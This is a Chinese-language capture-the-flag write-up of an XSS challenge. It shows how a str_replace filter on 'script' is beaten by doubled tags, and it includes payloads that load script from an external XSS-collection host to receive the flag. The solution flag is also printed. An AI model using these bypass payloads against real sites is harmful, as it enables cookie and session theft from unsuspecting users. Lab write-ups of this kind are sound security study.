题目描述

题目截图如下：

进入场景看看：

解题思路

• 之间写过一题类似的，所以这题应该是有什么不同的
• 那就按照之前的思路进行测试试试
• 提示说：需要xss平台接收flag，这个和之前说的提示一样

相关工具

• xss平台：https://xssaq.com
• 对xss的一些绕过进行学习了解

解题步骤

1. 输入测试一下script代码：

<script>alert(1)</script>

发现script被过滤了，script被替换为空。参考：str_replace()函数：将字符串中的指定字符替换为其他字符

2. 换个大小写的试试：

<ScRipt>ALeRt(“XSS”);</sCRipT>

还是被过滤了！，大小写绕过！

3. 使用双写试试

<scscriptript>alert('z')</scscriptript>

解释：将中间的script替换为空，剩下的结合后又是script可以成功绕过。

所以确定了过滤方式之后，找个xss平台（https://xssaq.com）测试一下：

之后测试其中的代码，始终没有反应：
极限短码（好像不行）：

<scsCRiPtript/SrC=//uj.ci/qoe>

这个好像可以正常：

<scsCRiPtript/sRC=//uj.ci/v9o></scsCRiPtript>

然后在评论区发现，管理员说xss平台需要http模式的…

然后我找了半天没有找到这个http的平台，但是当我再次看这个平台的时候，哦豁出来又！也就是说https其实也可以，只是比较慢而已？

PS：除了会大小绕过之外，其实还会对空格进行绕过。所以需要注意我们的测试代码中没有空格或者使用·/·，来绕过对空格的限制。

得到Flag

flag{772af954ed340063c935a60d92093504}

新知识点

• XSS篇——XSS过滤绕过技巧

• xss各种姿势的学习(包含绕过)和个人重要总结

对此，需要重点学习一下！

有用的话，请点赞收藏评论，帮助更多的同学哦